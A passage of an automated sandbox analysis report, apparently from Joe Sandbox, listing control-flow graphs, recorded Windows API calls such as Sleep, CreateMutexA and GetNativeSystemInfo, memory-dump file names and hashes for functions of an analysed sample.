                                                                                                                                                                                                control_flow_graph 491 eca856-eca86e 492 eca89c-eca89e 491->492 493 eca870-eca87c 491->493 496 eca8a9-eca8b1 call ec7d30 492->496 497 eca8a0-eca8a7 492->497 494 eca87e-eca88c 493->494 495 eca892-eca899 call edd663 493->495 494->495 498 eca94e 494->498 495->492 507 eca8e4-eca8e6 496->507 508 eca8b3-eca8bb call ec7d30 496->508 500 eca8eb-eca916 call ed80c0 497->500 505 eca953-eca987 Sleep CreateMutexA 498->505 506 eca94e call ef6c6a 498->506 510 eca98e-eca994 505->510 506->505 507->500 508->507 515 eca8bd-eca8c5 call ec7d30 508->515 512 eca996-eca998 510->512 513 eca9a7-eca9a8 510->513 512->513 516 eca99a-eca9a5 512->516 515->507 520 eca8c7-eca8cf call ec7d30 515->520 516->513 520->507 523 eca8d1-eca8d9 call ec7d30 520->523 523->507 526 eca8db-eca8e2 523->526 526->500
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00ECA963
                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00F23254), ref: 00ECA981
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                • Opcode ID: 0206a07b42476ebb599eb13241a4288d0526dff047ba576d4e156dc0104a1a10
                                                                                                                                                                                                • Instruction ID: 84b2dc50784f01dd5cd1ef971e262bba2a444c7b270b53fc35381367e9c89f5a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0206a07b42476ebb599eb13241a4288d0526dff047ba576d4e156dc0104a1a10
                                                                                                                                                                                                • Instruction Fuzzy Hash: 48213E7134410987EB285B68DB8EF6DB662DBC1308F28242EE545F73D1C67748835653
                                                                                                                                                                                                Function 00ECA34F Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 468 eca34f-eca35b 469 eca35d-eca36b 468->469 470 eca371-eca39a call edd663 468->470 469->470 471 eca93a 469->471 476 eca39c-eca3a8 470->476 477 eca3c8-eca916 call ed80c0 470->477 474 eca953-eca994 Sleep CreateMutexA 471->474 475 eca93a call ef6c6a 471->475 482 eca996-eca998 474->482 483 eca9a7-eca9a8 474->483 475->474 478 eca3be-eca3c5 call edd663 476->478 479 eca3aa-eca3b8 476->479 478->477 479->471 479->478 482->483 486 eca99a-eca9a5 482->486 486->483
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00ECA963
                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00F23254), ref: 00ECA981
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                • Opcode ID: 4f79173933db613dea157ebf937ac2e833cd5a2adc2c40268f8136b9226ef386
                                                                                                                                                                                                • Instruction ID: df29c2edf93355abbb2a23599b9953237023ed8e4e192c7221fb0499985c2a2d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f79173933db613dea157ebf937ac2e833cd5a2adc2c40268f8136b9226ef386
                                                                                                                                                                                                • Instruction Fuzzy Hash: 042148717042089BEB189B6CEE89B6DF762EBC1318F28522DE404F77D5C77799828352
                                                                                                                                                                                                Function 00EC7D30 Relevance: 1.9, APIs: 1, Instructions: 426COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 527 ec7d30-ec7db2 call ef40f0 531 ec7db8-ec7de0 call ed7a00 call ec5c10 527->531 532 ec8356-ec8373 call edcff1 527->532 539 ec7de4-ec7e06 call ed7a00 call ec5c10 531->539 540 ec7de2 531->540 545 ec7e08 539->545 546 ec7e0a-ec7e23 539->546 540->539 545->546 549 ec7e54-ec7e7f 546->549 550 ec7e25-ec7e34 546->550 553 ec7eb0-ec7ed1 549->553 554 ec7e81-ec7e90 549->554 551 ec7e4a-ec7e51 call edd663 550->551 552 ec7e36-ec7e44 550->552 551->549 552->551 557 ec8374 call ef6c6a 552->557 555 ec7ed7-ec7edc 553->555 556 ec7ed3-ec7ed5 GetNativeSystemInfo 553->556 559 ec7ea6-ec7ead call edd663 554->559 560 ec7e92-ec7ea0 554->560 561 ec7edd-ec7ee6 555->561 556->561 568 ec8379-ec837f call ef6c6a 557->568 559->553 560->557 560->559 566 ec7ee8-ec7eef 561->566 567 ec7f04-ec7f07 561->567 570 ec7ef5-ec7eff 566->570 571 ec8351 566->571 572 ec7f0d-ec7f16 567->572 573 ec82f7-ec82fa 567->573 575 ec834c 570->575 571->532 576 ec7f18-ec7f24 572->576 577 ec7f29-ec7f2c 572->577 573->571 578 ec82fc-ec8305 573->578 575->571 576->575 580 ec82d4-ec82d6 577->580 581 ec7f32-ec7f39 577->581 582 ec832c-ec832f 578->582 583 ec8307-ec830b 578->583 586 ec82d8-ec82e2 580->586 587 ec82e4-ec82e7 580->587 588 ec7f3f-ec7f9b call ed7a00 call ec5c10 call ed7a00 call ec5c10 call ec5d50 581->588 589 ec8019-ec82bd call ed7a00 call ec5c10 call ed7a00 call ec5c10 call ec5d50 call ed7a00 call ec5c10 call ec5730 call ed7a00 call ec5c10 call ed7a00 call ec5c10 call ec5d50 call ed7a00 call ec5c10 call ec5730 call ed7a00 call ec5c10 call ed7a00 call ec5c10 call ec5d50 call ed7a00 call ec5c10 call ec5730 call ed7a00 call ec5c10 call ed7a00 call ec5c10 call ec5d50 call ed7a00 call ec5c10 call ec5730 581->589 584 ec833d-ec8349 582->584 585 ec8331-ec833b 582->585 590 ec830d-ec8312 583->590 591 ec8320-ec832a 583->591 584->575 585->571 586->575 587->571 593 ec82e9-ec82f5 587->593 612 ec7fa0-ec7fa7 588->612 626 ec82c3-ec82cc 589->626 590->591 595 ec8314-ec831e 590->595 591->571 593->575 595->571 614 ec7fa9 612->614 615 ec7fab-ec7fcb call ef8bbe 612->615 614->615 622 ec7fcd-ec7fdc 615->622 623 ec8002-ec8004 615->623 627 ec7fde-ec7fec 622->627 628 ec7ff2-ec7fff call edd663 622->628 625 ec800a-ec8014 623->625 623->626 625->626 626->573 630 ec82ce 626->630 627->568 627->628 628->623 630->580
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EC7ED3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                                                • Opcode ID: 43ad951011e419cf1baf219dfe130e96fde22a11463b3d3c8d1e8ef9b773cb25
                                                                                                                                                                                                • Instruction ID: 4ada868e853fe5343f285a042d6b70e1cca1ba8b4c38bc63b077590bd9378c9b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 43ad951011e419cf1baf219dfe130e96fde22a11463b3d3c8d1e8ef9b773cb25
                                                                                                                                                                                                • Instruction Fuzzy Hash: 20E12A71E006549BDB14BB28CF0BB9E7BA1AB41720F94128DE455773C2DB365F829BC2
                                                                                                                                                                                                Function 00EFD82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 826 efd82f-efd83a 827 efd83c-efd846 826->827 828 efd848-efd84e 826->828 827->828 829 efd87c-efd887 call ef75f6 827->829 830 efd867-efd878 RtlAllocateHeap 828->830 831 efd850-efd851 828->831 836 efd889-efd88b 829->836 832 efd87a 830->832 833 efd853-efd85a call ef9dc0 830->833 831->830 832->836 833->829 839 efd85c-efd865 call ef8e36 833->839 839->829 839->830
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EFA813,00000001,00000364,00000006,000000FF,?,00EFEE3F,?,00000004,00000000,?,?), ref: 00EFD870
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
